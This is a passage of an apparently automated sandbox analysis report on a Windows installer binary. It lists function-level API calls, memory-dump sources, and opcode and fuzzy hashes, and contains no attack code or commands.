• Opcode ID: 9ce491e7070547b28ae08ae1e04f072145ebf2dc362ad7093cc3bd8079c2d61c
• Instruction ID: b0d3dbac768884ead2b93985f1d779266919649e73a2972554d10ac1522e8d60
• Opcode Fuzzy Hash: 9ce491e7070547b28ae08ae1e04f072145ebf2dc362ad7093cc3bd8079c2d61c
• Instruction Fuzzy Hash: 2651F470800208DADB14EBB4C8A57ED7B64AF05358F44419FFC4A672E3E7384A8DCB99
Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0043DEAD
                                                                                                                                                                          • VirtualQuery.KERNEL32(?,0043E082,0000001C,0000004C,0043E082,00000008,?,0043EBF5,8DF633FF,?,?,?,0043E0EF,0043EBF5,?,00000008), ref: 0043DED9
                                                                                                                                                                            • Part of subcall function 0043E11F: CompareStringA.KERNEL32(00000400,00000001,?,00000008,00000008,000000FF,DA3EE8FF,00000000,0043EBF5,?,0043DEF5,.debug,0043EBF5,?,0043E0EF,0043EBF5), ref: 0043E147
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,0043E0EF,0043EBF5,?), ref: 0043DF8E
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,?,0043E0EF,?,?,0043E0EF,0043EBF5,?), ref: 0043DFB0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareFileH_prolog3InfoQueryStringSystemViewVirtual
                                                                                                                                                                          • String ID: .debug$.rdata$.text
                                                                                                                                                                          • API String ID: 3690134103-733372908
                                                                                                                                                                          • Opcode ID: 8797528110da42d44ba166f713ca4935dad7430a785de0d5c75df3c39d401016
                                                                                                                                                                          • Instruction ID: 14cd16ce59270cd654d7064bb06bb805502fb9a05a4c1a2a6b26d35be1cb364b
                                                                                                                                                                          • Opcode Fuzzy Hash: 8797528110da42d44ba166f713ca4935dad7430a785de0d5c75df3c39d401016
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E418271A0060A9FDB04DF94D885EAEB7B2FF88314F25811BE915A7381DB74ED50CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00458D8A
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
                                                                                                                                                                          • LoadTypeLib.OLEAUT32(?,?), ref: 00458DFF
                                                                                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00458E19
                                                                                                                                                                          • RegOverridePredefKey.ADVAPI32(80000000,00000000), ref: 00458EBB
                                                                                                                                                                            • Part of subcall function 00458F45: GetVersionExW.KERNEL32(?), ref: 00458F69
                                                                                                                                                                            • Part of subcall function 00454E9F: RegOverridePredefKey.ADVAPI32(80000000,?), ref: 00454ED7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3$ErrorLastOverridePredefType$LoadRegisterVersion
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3828359244-1835203436
                                                                                                                                                                          • Opcode ID: ebf2625942d6bcb99a9345f142df2c3caf6a8d27f446bb07a1204190344a18e1
                                                                                                                                                                          • Instruction ID: 464651685bd1a6c3155460d26d6a3f4eb557c906968accb782a47857bed2d2d5
                                                                                                                                                                          • Opcode Fuzzy Hash: ebf2625942d6bcb99a9345f142df2c3caf6a8d27f446bb07a1204190344a18e1
                                                                                                                                                                          • Instruction Fuzzy Hash: FA416070500205EFDF04DFA5C849AAD3BB8AF04309F50805EFC19EB252DB79D949CB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041840E
                                                                                                                                                                            • Part of subcall function 0045FC5E: __EH_prolog3.LIBCMT ref: 0045FC65
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                          • _memmove.LIBCMT ref: 004184E2
                                                                                                                                                                          • _memmove.LIBCMT ref: 00418502
                                                                                                                                                                          • GetWindowDC.USER32(00000000), ref: 0041850C
                                                                                                                                                                          • CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 00418524
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0041854F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$BitmapCreateH_prolog3H_prolog3_ReleaseWindow_malloc
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 2267778706-3887548279
                                                                                                                                                                          • Opcode ID: 367104b1cd412e7b3a6893bd0c6b1cfdcf4a11267bcebaba29ed9f3e24280cd1
                                                                                                                                                                          • Instruction ID: fb4f99afd84b0f907d7861aec64ad6a5bd2aa5599f925c5186c034417dc8d7b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 367104b1cd412e7b3a6893bd0c6b1cfdcf4a11267bcebaba29ed9f3e24280cd1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E415E71900218AFEB10DF65DC41BE9B7B9FF08314F1081AAE959E7292EB349E85CF14
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00417136
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00457832: __EH_prolog3_GS.LIBCMT ref: 0045783C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorLast$H_prolog3$FreeString
                                                                                                                                                                          • String ID: .ini$0x%04x$FontName$HsG$Properties$Tahoma
                                                                                                                                                                          • API String ID: 827811706-850740382
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3_GS.LIBCMT ref: 004585B7
• GetModuleHandleW.KERNEL32(Ntdll.dll,NtQueryInformationProcess,?,00000400,?,000004A0,0045859B,00000000,?,0000006C,0045932E,00457D82,?,?), ref: 004585E7
• GetProcAddress.KERNEL32(00000000), ref: 004585EE
• OpenProcess.KERNEL32(00000400,00000000,?,?,0000006C,0045932E,00457D82,?,?), ref: 0045861A
• _memset.LIBCMT ref: 0045863F
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorFreeLastString$AddressH_prolog3_HandleModuleOpenProcProcess_memset
• String ID: NtQueryInformationProcess$Ntdll.dll
• API String ID: 954382961-801751246
Uniqueness
Uniqueness Score: -1.00%
APIs
• RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000), ref: 0045D932
• RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,00000000), ref: 0045D96D
• RegQueryValueExW.ADVAPI32(00000000,AutoConfigURL,00000000,00000000,?,00000004,?,00000000), ref: 0045D9A7
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: QueryValue$Open
• String ID: AutoConfigURL$HsG$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings
• API String ID: 1606891134-3110392506
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3_GS.LIBCMT ref: 0042A7BB
• _memset.LIBCMT ref: 0042A7DE
  • Part of subcall function 00401500: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00401528
  • Part of subcall function 00435541: __EH_prolog3.LIBCMT ref: 00435548
• lstrcpyW.KERNEL32 ref: 0042A844
• lstrcatW.KERNEL32(?," /%), ref: 0042A86B
• _wcschr.LIBCMT ref: 0042A876
• lstrcatW.KERNEL32(?,00000000), ref: 0042A889
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcat$H_prolog3H_prolog3_QueryValue_memset_wcschrlstrcpy
• String ID: " /%
• API String ID: 2854241388-1244271203
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetProcessId,00000000,00457D82,?,00456AF6,00000000,?,?,?,?,?,0000006C,0045932E,00457D82,?), ref: 00456F32
• GetProcAddress.KERNEL32(00000000), ref: 00456F39
• OpenProcess.KERNEL32(001FFFFF,00000001,?,00000000,00000000,00457D82,?,00456AF6,00000000,?,?,?,?,?,0000006C,0045932E), ref: 00456F59
• GetProcessTimes.KERNEL32(00457D82,0045932E,0000006C,?,?,00000000,00000000,00457D82,?,00456AF6,00000000,?,?,?,?,?), ref: 00456F72
• CloseHandle.KERNEL32(00457D82,?,00456AF6,00000000,?,?,?,?,?,0000006C,0045932E,00457D82,?,?), ref: 00456F7F
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: HandleProcess$AddressCloseModuleOpenProcTimes
• String ID: GetProcessId$kernel32.dll
• API String ID: 4254294609-399901964
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3.LIBCMT ref: 004590C8
• GetModuleHandleW.KERNEL32(kernel32.dll,RemoveDirectoryW,00000004,00455C3A), ref: 004590DD
• GetProcAddress.KERNEL32(00000000), ref: 004590E4
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
• GetLastError.KERNEL32 ref: 00459120
  • Part of subcall function 004591F0: __EH_prolog3_GS.LIBCMT ref: 004591F7
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3$AddressH_prolog3_HandleModuleProc
                                                                                                                                                                          • String ID: HsG$RemoveDirectoryW$kernel32.dll
                                                                                                                                                                          • API String ID: 2400663618-2330775976
                                                                                                                                                                          • Opcode ID: ac6e3401959d509525022dd2fb37bc30ebed1f928715c3bcee9a6f866b30e3e5
                                                                                                                                                                          • Instruction ID: 52146a99c4b7991de24ae616d7d40cf8f25eec4746e0f0e0dbe13586e44e4ecb
                                                                                                                                                                          • Opcode Fuzzy Hash: ac6e3401959d509525022dd2fb37bc30ebed1f928715c3bcee9a6f866b30e3e5
                                                                                                                                                                          • Instruction Fuzzy Hash: E6F0D1B2500615EBCF15AFB58C4D69E37A4AB04316F91812EFC09DA242DB78CA08C79C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0045562A
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteFileW,00000004,0045570C,0000000A,00000000,00000000), ref: 0045563F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00455646
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455682
                                                                                                                                                                            • Part of subcall function 004591F0: __EH_prolog3_GS.LIBCMT ref: 004591F7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3$AddressH_prolog3_HandleModuleProc
                                                                                                                                                                          • String ID: DeleteFileW$HsG$kernel32.dll
                                                                                                                                                                          • API String ID: 2400663618-626139012
                                                                                                                                                                          • Opcode ID: c33d8a81dedb9f9bf1ac2fdb8a3483f8383d137e09e23b1d3ee02cb5ced63bad
                                                                                                                                                                          • Instruction ID: 5764dd03317634f981955eb4ec97349bd123db5dac9be347af981987845c21eb
                                                                                                                                                                          • Opcode Fuzzy Hash: c33d8a81dedb9f9bf1ac2fdb8a3483f8383d137e09e23b1d3ee02cb5ced63bad
                                                                                                                                                                          • Instruction Fuzzy Hash: D1F081B2500605EBCF11AFB58C5D6AE37A4AB04316B91812EFC0DDA252DB7CCA08C79D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: Wiz$Inst$allS$ard$d$hiel
                                                                                                                                                                          • API String ID: 2427045233-3898594558
                                                                                                                                                                          • Opcode ID: 0bc5e367764efd8d6fb1eabef9b0cfa4a2598a203853fea0cedc24ba45cf0a9d
                                                                                                                                                                          • Instruction ID: ccdbbe702f1b6c37de8d7788d4c37eabaf773f4e9197fdd8d90e04b5751dc522
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc5e367764efd8d6fb1eabef9b0cfa4a2598a203853fea0cedc24ba45cf0a9d
                                                                                                                                                                          • Instruction Fuzzy Hash: 89F017B1D0421CABDF01DF96C9816DEBBB4BF08704F94501EE544BB341C7B99B498BA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __lock.LIBCMT ref: 0044CBE0
                                                                                                                                                                            • Part of subcall function 0044DBCA: __mtinitlocknum.LIBCMT ref: 0044DBDC
                                                                                                                                                                            • Part of subcall function 0044DBCA: EnterCriticalSection.KERNEL32(?,?,00447A09,0000000D,00497E60,0000000C,00442F17,?,?,00443311,?,?), ref: 0044DBF5
                                                                                                                                                                            • Part of subcall function 00445DCF: __calloc_impl.LIBCMT ref: 00445DDE
                                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0044CC0C
                                                                                                                                                                          • GetStartupInfoW.KERNEL32(?,00497EC0,00000064,00445157,00497C10,00000014), ref: 0044CC65
                                                                                                                                                                          • GetFileType.KERNEL32(00000001), ref: 0044CCF7
                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0044CD30
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalSection$CallCountEnterFileFilterFunc@8InfoInitializeSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2424608112-0
                                                                                                                                                                          • Opcode ID: 1238f08f00301191b9566f8d46c47e618392ed4d23cb94ebf59699c6c831921c
                                                                                                                                                                          • Instruction ID: 343f0ee27ecc99cb7b2b4c160810ffe1b5a635ce004eae2e11f8e9c4aa7a3975
                                                                                                                                                                          • Opcode Fuzzy Hash: 1238f08f00301191b9566f8d46c47e618392ed4d23cb94ebf59699c6c831921c
                                                                                                                                                                          • Instruction Fuzzy Hash: E881C870D067458FEB54CF68C8C45A9BFF0AF06324B28466ED4AAA73D1C7389843CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(00000003,00000000,00000002,00000000,00000003,00000000,00000000,00000000), ref: 0045DC6B
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0045DC73
                                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 0045DC83
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0045DCD6
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0045DCE4
                                                                                                                                                                          • __alldvrm.LIBCMT ref: 0045DD51
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045DD68
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045DD8D
                                                                                                                                                                            • Part of subcall function 0045DF88: GetTickCount.KERNEL32 ref: 0045DF97
                                                                                                                                                                            • Part of subcall function 0045DF88: GetTickCount.KERNEL32 ref: 0045DFC0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountTick$CounterPerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$EventReset__alldvrm
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3317835756-0
                                                                                                                                                                          • Opcode ID: 4e44423a90849df83373dcd05dddda67934b70f1da7590044fb4c75f4e2ace33
                                                                                                                                                                          • Instruction ID: 843ed6ac573392e146f2ce9ae66c149fe619aa4da3621ee006800d0791e6d08f
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e44423a90849df83373dcd05dddda67934b70f1da7590044fb4c75f4e2ace33
                                                                                                                                                                          • Instruction Fuzzy Hash: C1515D71A00704AFDB21DFA5C885BABB7F5FF84316F10882EE94AD6251D778A849CF14
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$H_prolog3__memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 838622107-0
                                                                                                                                                                          • Opcode ID: b8a9b5079bc545baaf57042b9e392e1e3feb8407798a3a275a43647f3d94c93f
                                                                                                                                                                          • Instruction ID: 08243c99e99c3c215ea443f3f4074a6b1d047b6ee25c0b09c90066e49b80c567
                                                                                                                                                                          • Opcode Fuzzy Hash: b8a9b5079bc545baaf57042b9e392e1e3feb8407798a3a275a43647f3d94c93f
